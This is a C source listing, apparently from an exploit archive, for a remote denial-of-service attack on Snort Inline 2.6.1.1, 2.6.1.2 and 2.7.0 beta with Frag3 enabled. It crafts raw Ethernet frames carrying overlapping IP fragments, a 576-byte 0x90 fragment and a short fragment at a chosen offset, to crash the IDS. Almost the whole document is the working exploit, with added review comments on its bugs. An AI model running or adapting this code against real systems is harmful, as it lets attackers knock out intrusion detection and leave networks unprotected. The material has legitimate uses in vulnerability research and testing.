Snort 2.6.1.1/2.6.1.2/2.7.0 (fragmentation) Remote DoS Exploit
来源:antimatter@gmail.com 作者:Antimatt3r 发布时间:2007-03-09  
/*********************************************************
* DOS Snort Inline
* Affected Versions: 2.6.1.1, 2.6.1.2, 2.7.0(beta)
* Requirements : Frag3 Enabled, Inline, Linux, ip_conntrack disabled
* Antimatt3r
* antimatter@gmail.com
* Offset needs to be supplied that would cause reassembly for different snort
* fragmentation reassembly policies. Since the first packet is hardcoded 70-74 offset
* will trigger the segfault.
********************************************************/

#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <net/if.h>
#include <net/ethernet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <netinet/ip.h>
#include <netinet/if_ether.h>
#include <netpacket/packet.h>


#define NOOP_FRAG_SLED 576 /* payload bytes (0x90) carried by the first fragment, see send_morefrag_packet() */
#define NOOP_SHORT 16      /* payload bytes (0x90) carried by the second fragment, see send_overlap_packet() */


/* One endpoint of the test flow: IPv4 address plus link-layer address. */
struct addr {
  uint32_t ip;        /* IPv4 address in network byte order (filled by inet_aton() in main()) */
  char mac[ETH_ALEN]; /* raw 6-byte hardware address (filled by mac_aton()) */
};

/* Output interface; resolved once in main() via if_nametoindex(). */
struct dev {
  uint32_t index;      /* kernel interface index, used as sll_ifindex for the PF_PACKET socket */
  char name[IFNAMSIZ]; /* interface name; main() zeroes the struct before strncpy(), so it stays NUL-terminated */
};

/* Parse "aa:bb:cc:dd:ee:ff"-style text into raw bytes; defined below. */
int mac_aton(char *, char *);
/*
 * Print the command-line synopsis to stderr.
 *
 * cmd  program name to show in the synopsis (argv[0] in main()).
 */
void usage(char *cmd) {
  const char *prog = cmd;

  fprintf(stderr,
          "usage: %s <device> <source_ip>  <src_mac> <dst_ip>  <dst_mac>  <offset>\n",
          prog);
}

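/*
 * Decode a single hexadecimal digit.
 *
 * c  character to decode (either case accepted)
 *
 * Returns the digit's value 0..15, or -1 when c is not a hex digit.
 */
static int hex_digit_value(char c) {
  if (c >= '0' && c <= '9') {
    return c - '0';
  }
  if (c >= 'a' && c <= 'f') {
    return c - 'a' + 10;
  }
  if (c >= 'A' && c <= 'F') {
    return c - 'A' + 10;
  }
  return -1;
}

/*
 * Parse a textual hardware address ("00:11:22:aa:bb:cc") into raw bytes.
 *
 * amac  NUL-terminated text; octets are one or two hex digits separated by ':'
 * nmac  destination for up to ETH_ALEN raw bytes
 *
 * Returns 0 on success; -1 with errno = EINVAL when a character that is
 * neither a hex digit nor a separator is met.
 *
 * Leniency preserved from the original: fewer than ETH_ALEN octets is
 * accepted and the remaining bytes of nmac are left untouched (main()
 * zeroes the containing struct first), and any text after the sixth octet
 * is ignored.
 */
int mac_aton(char *amac, char *nmac) {
  int i = 0;

  while ((*amac != '\0') && (i < ETH_ALEN)) {
    /* First (high) nibble is mandatory. */
    int hi = hex_digit_value(*amac++);
    if (hi < 0) {
      errno = EINVAL;
      return -1;
    }
    unsigned int val = (unsigned int)hi << 4;

    /* Second nibble is optional: a ':' or the terminator ends a one-digit octet. */
    char c = *amac;
    int lo = hex_digit_value(c);
    if (lo >= 0) {
      val |= (unsigned int)lo;
    }
    else if (c == ':' || c == '\0') {
      val >>= 4; /* single-digit octet: undo the shift */
    }
    else {
      errno = EINVAL;
      return -1;
    }
    if (c != '\0') {
      amac++; /* consume the second digit or the ':' */
    }
    *nmac++ = (char)(val & 0xff);
    i++;

    /* A separator may follow a two-digit octet - not required. */
    if (*amac == ':') {
      amac++;
    }
  }
  return 0;
}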


/*
 * Standard Internet (RFC 1071 style) ones'-complement checksum.
 *
 * addr  start of the data, read as 16-bit words in memory order
 * len   number of bytes; an odd trailing byte is taken as the low-address
 *       byte of a final word whose other byte is zero
 *
 * Returns the 16-bit complement of the folded sum (as an int, 0..0xffff);
 * the IP header is checksummed with its check field still zero.
 */
int in_cksum(u_short *addr, int len) {
  int sum = 0;
  u_short *cursor = addr;
  int remaining;

  /* Accumulate whole 16-bit words. */
  for (remaining = len; remaining > 1; remaining -= 2) {
    sum += *cursor++;
  }

  /* Odd trailing byte: place it in the first byte of a zeroed word. */
  if (remaining == 1) {
    u_short last = 0;
    memcpy(&last, cursor, 1);
    sum += last;
  }

  /* Fold the carries back into 16 bits, twice, then complement. */
  sum = (sum >> 16) + (sum & 0xffff);
  sum += sum >> 16;
  return (u_short)~sum;
}

/*
 * Build and transmit the first IPv4 fragment of the test flow: an
 * Ethernet/IPv4/UDP frame carrying NOOP_FRAG_SLED bytes of 0x90 whose IP
 * header has the More-Fragments bit set (frag_off = 0x2000) at offset 0.
 *
 * sock  raw PF_PACKET socket opened by main()
 * dev   output interface; only dev->index is used
 * src   source IPv4 address and MAC for the IP/Ethernet headers
 * dst   destination IPv4 address and MAC; the MAC is also the link-layer
 *       target given to sendto() via sll_addr
 *
 * NOTE(review): declared int but falls off the end without a return
 * statement, so main()'s "< 0" test reads an indeterminate value.  The
 * sendto() failure is only printed here; the function should end with
 * `return -1;` on the error path and `return 0;` otherwise.
 */
int send_morefrag_packet(int sock, struct dev *dev, struct addr *src, struct
addr *dst) {
  struct sockaddr_ll sll;
  struct ether_header *eth;
  struct iphdr *ip;
  struct udphdr *udp;
  u_char *payload;
  char buf[sizeof(struct ether_header) + sizeof(struct iphdr) + sizeof(struct udphdr)+ NOOP_FRAG_SLED];

  /* Link-layer destination for the PF_PACKET sendto(). */
  memset(&sll, 0, sizeof(sll));
  sll.sll_family = PF_PACKET;
  sll.sll_ifindex = dev->index;
  sll.sll_halen = ETH_ALEN;
  memcpy(&sll.sll_addr, dst->mac, ETH_ALEN);

  /* Zero the frame so every header field not set below (tos, check, ...) is 0. */
  memset(buf, 0, sizeof(buf));
  eth = (struct ether_header *)buf;
  ip = (struct iphdr *)((char *)eth + sizeof(struct ether_header));
  udp = (struct udphdr *)((char *)ip + sizeof(struct iphdr));
  payload = (u_char *)((char *)udp + sizeof(struct udphdr));

  memset(payload,'\x90',NOOP_FRAG_SLED);


  udp->source = htons(1111);
  udp->dest = htons(1111);
  udp->len =  htons(sizeof(struct udphdr) + NOOP_FRAG_SLED) ;
  udp->check =0; /* zero = no UDP checksum (IPv4) */


  ip->version = 4;
  ip->ihl = 5;
  ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + NOOP_FRAG_SLED);
  ip->id = 31337; /* NOTE(review): stored in host byte order, unlike the other 16-bit fields - presumably htons() was intended */
  ip->ttl = 64;
  ip->frag_off = htons(0x2000); /* MF flag set, fragment offset 0 */
  ip->protocol = IPPROTO_UDP;
  ip->saddr = src->ip;
  ip->daddr = dst->ip;
  /* Computed last, with ip->check still zero from the memset above. */
  ip->check = in_cksum((u_short *)ip, sizeof(struct iphdr));
 
  memcpy(eth->ether_shost, src->mac, ETH_ALEN);
  memcpy(eth->ether_dhost, dst->mac, ETH_ALEN);
  eth->ether_type = htons(ETH_P_IP);

  /* Failure is reported on stdout only; no status is returned to the caller. */
  if(sendto(sock, buf, sizeof(buf), 0, (struct sockaddr *)&sll, sizeof(sll)) == -1)
printf ("error %d %s\n",errno,strerror(errno));
  else
printf("MF Packet Sent\n");
}

/*
 * Build and transmit the second IPv4 fragment: structurally the same frame
 * as send_morefrag_packet() but with NOOP_SHORT payload bytes and the
 * caller-supplied value written into the 16-bit frag_off field.
 *
 * sock    raw PF_PACKET socket opened by main()
 * dev     output interface; only dev->index is used
 * src     source IPv4 address and MAC for the IP/Ethernet headers
 * dst     destination IPv4 address and MAC (also the sll_addr target)
 * offset  raw value for the IP flags/fragment-offset field; it is not
 *         range-checked here, and main() derives it from atoi()
 *
 * NOTE(review): declared int but has no return statement; main() tests
 * the result with "< 0" and so reads an indeterminate value.  Add
 * `return -1;` after the error printf and `return 0;` at the end.
 */
int send_overlap_packet(int sock, struct dev *dev, struct addr *src, struct
addr *dst,int offset) {
  struct sockaddr_ll sll;
  struct ether_header *eth;
  struct iphdr *ip;
  struct udphdr *udp;
  u_char *payload;
  char buf[sizeof(struct ether_header) + sizeof(struct iphdr) + sizeof(struct udphdr)+ NOOP_SHORT ];

  /* Link-layer destination for the PF_PACKET sendto(). */
  memset(&sll, 0, sizeof(sll));
  sll.sll_family = PF_PACKET;
  sll.sll_ifindex = dev->index;
  sll.sll_halen = ETH_ALEN;
  memcpy(&sll.sll_addr, dst->mac, ETH_ALEN);

  /* Zero the frame so every header field not set below is 0. */
  memset(buf, 0, sizeof(buf));
  eth = (struct ether_header *)buf;
  ip = (struct iphdr *)((char *)eth + sizeof(struct ether_header));
  udp = (struct udphdr *)((char *)ip + sizeof(struct iphdr));
  payload = (u_char *)((char *)udp + sizeof(struct udphdr));

  memset(payload,'\x90',NOOP_SHORT);

  udp->source = htons(1111);
  udp->dest = htons(1111);
  udp->len =  htons(sizeof(struct udphdr) + NOOP_SHORT) ;
  udp->check =0; /* zero = no UDP checksum (IPv4) */

  ip->version = 4;
  ip->ihl = 5;
  ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + NOOP_SHORT);
  ip->id = 31337; /* NOTE(review): host byte order, same as in send_morefrag_packet() - presumably htons() was intended */
  /* ntohs() and htons() perform the same byte swap, so this works, but htons() is the conventional call for a field being put on the wire. */
  ip->frag_off = ntohs(offset);
  ip->ttl = 64;
  ip->protocol = IPPROTO_UDP;
  ip->saddr = src->ip;
  ip->daddr = dst->ip;
  /* Computed last, with ip->check still zero from the memset above. */
  ip->check = in_cksum((u_short *)ip, sizeof(struct iphdr));
 
  memcpy(eth->ether_shost, src->mac, ETH_ALEN);
  memcpy(eth->ether_dhost, dst->mac, ETH_ALEN);
  eth->ether_type = htons(ETH_P_IP);

  /* Failure is reported on stdout only; no status is returned to the caller. */
  if(sendto(sock, buf, sizeof(buf), 0, (struct sockaddr *)&sll, sizeof(sll)) == -1)
printf ("error %d %s\n",errno,strerror(errno));
  else
printf("2nd Packet Sent\n");
}


/*
 * Entry point: parse <device> <source_ip> <src_mac> <dst_ip> <dst_mac>
 * <offset>, open a raw PF_PACKET socket (needs raw-socket privilege) and
 * send the two fragments.
 *
 * Returns 0 on success; argument errors exit with status 255 (exit(-1) /
 * return -1 are truncated to 255 by the OS).
 *
 * NOTE(review): the "< 0" checks on send_morefrag_packet() and
 * send_overlap_packet() are meaningless today because neither function
 * returns a value (both fall off the end of an int function).
 */
int main(int argc, char *argv[]) {
  int sock = 0;
  struct dev dev;
  struct addr src, dst;
  int offset; //play with varying offsets

  if (argc < 7) {
    usage(argv[0]);
    return -1;
  }

  /* memset + IFNAMSIZ-1 copy keeps dev.name NUL-terminated (strncpy alone would not). */
  memset(&dev, 0, sizeof(dev));
  strncpy(dev.name, argv[1], IFNAMSIZ-1);
  if((dev.index = if_nametoindex(dev.name)) == 0) {
    perror(argv[1]);
    exit(-1);
  }

  /* Zeroed first so a short MAC from mac_aton() leaves the rest as 0x00. */
  memset(&src, 0, sizeof(src));
  if (inet_aton(argv[2], (struct in_addr *)&src.ip) == 0) {
    fprintf(stderr, "%s: invalid src ip address\n", argv[2]);
    exit(-1);
  }

  if (mac_aton(argv[3], src.mac) < 0) {
    fprintf(stderr, "%s: invalid src hardware address\r\n", argv[3]);
    exit(-1);
  }

  memset(&dst, 0, sizeof(dst));
  if (inet_aton(argv[4], (struct in_addr *)&dst.ip) == 0) {
    /* NOTE(review): message reports argv[2] but the value parsed was argv[4]. */
    fprintf(stderr, "%s: invalid ip address\r\n", argv[2]);
    exit(-1);
  }

  if (mac_aton(argv[5], dst.mac) < 0) {
    /* NOTE(review): message reports argv[3] but the value parsed was argv[5]. */
    fprintf(stderr, "%s: invalid hardware address\r\n", argv[3]);
    exit(-1);
  }

  /* atoi() gives no error indication: non-numeric text silently becomes 0; strtol() would detect it. */
  offset = atoi(argv[6]);

  if ((sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) {
     perror("socket");
     exit(-1);
  }

  if (send_morefrag_packet(sock, &dev, &src, &dst) < 0) {
    perror("send error ");
    exit(-1);
  }
 
  if (send_overlap_packet(sock, &dev, &src, &dst,offset) < 0) {
    perror("send error");
    exit(-1);
  }

  close(sock);

  return 0;
}

 